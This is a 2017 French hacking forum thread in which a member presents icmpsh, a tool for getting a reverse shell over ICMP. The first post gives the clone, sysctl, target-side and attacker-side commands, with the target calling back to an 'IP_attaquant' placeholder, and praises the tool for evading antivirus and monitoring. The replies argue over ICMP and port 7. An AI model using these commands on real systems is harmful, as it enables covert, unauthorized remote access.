Auteur Sujet: Attaque via IMCP  (Lu 2122 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 606
  • +36/-5
Attaque via IMCP
« le: 08 septembre 2017 à 15:15:49 »
Bonjour à tous,
Afin de changer du sempiternel Metasploit je voulais partager avec vous une attaque sur laquelle je suis tombé recemment : l'attaque ICMP
Elle se rapproche beaucoup par sa simplicité de netcat
Comme elle utilise un protocole de couche 3 (le fameux ping pour les nOObs) elle se fout des pb TCP/UDP et accessoirement elle est FUD AV.
Je vous invite à tester le paquet suivant :
git clone https://github.com/inquisb/icmpsh.git

N'oubliez pas de desactiver votre echo ping reply avant d'essayer car il est pris en charge par icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
Un exe à lancer sur la machine cible (existe aussi en C et en Perl dans le repertoire icmpsh) :
icmpsh.exe -t IP_attaquant
un script python à lancer sur la machine attaquante :
python icmpsh_m.py IP_attaquant IP_cibleEt shell obtenu dans la seconde
J'ai bien aimé l'approche via ICMP car beaucoup moins surveillé comme le lait sur le feu que TCP.

Note aux zhakers :
Malheureusement pour vous les gars cette attaque est à réaliser en LAN car à la question "C'est quoi le port ICMP ?" la réponse est "y en a pas mon pov Monsieur !" Cf mon intro sur la couche 3.
Donc on oublie les tentatives de connection en WAN avec port forwarding de votre routeur.



Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3795
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Attaque via IMCP
« Réponse #1 le: 08 septembre 2017 à 18:29:28 »
"C'est quoi le port ICMP ?" la réponse est "y en a pas mon pov Monsieur !"

On m'aurait menti ?


7    TCP    echo/ICMP(ping)

A host may connect to a server that supports the Echo Protocol using the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) on the well-known port number 7

   Another echo service is defined as a datagram based application on
   UDP.  A server listens for UDP datagrams on UDP port 7

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 606
  • +36/-5
Re : Attaque via IMCP
« Réponse #2 le: 08 septembre 2017 à 19:17:27 »
On vous a menti   ;)
Abus de langage de nos amis wikipedia
Le 7 est un ICMP encapsulé dans un TCP. mais l'ICMP en lui meme n'a pas de port. C'est son encapsulation qui lui donne le 7

http://www.techexams.net/forums/network/8777-icmp-port-number.html
http://www.commentcamarche.net/forum/affich-1578026-port-icmp

Dans le cas de cette attaque aucun datagrame tcp d'envoyé, ICMPSH utilise le champ DATA du protocole ICMP, et on reste en couche 3
« Modifié: 08 septembre 2017 à 19:22:19 par _john_doe »

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3795
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Attaque via IMCP
« Réponse #3 le: 11 septembre 2017 à 19:28:41 »
Tu as raison en effet, mais ça porte à confusion car c'est l'echo protocol qui utilise le port 7 et pas ICMP

voir: https://tools.ietf.org/html/rfc862 (echo protocol) et https://tools.ietf.org/html/rfc792 (INTERNET CONTROL MESSAGE PROTOCOL)

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 606
  • +36/-5
Re : Attaque via IMCP
« Réponse #4 le: 12 septembre 2017 à 09:37:20 »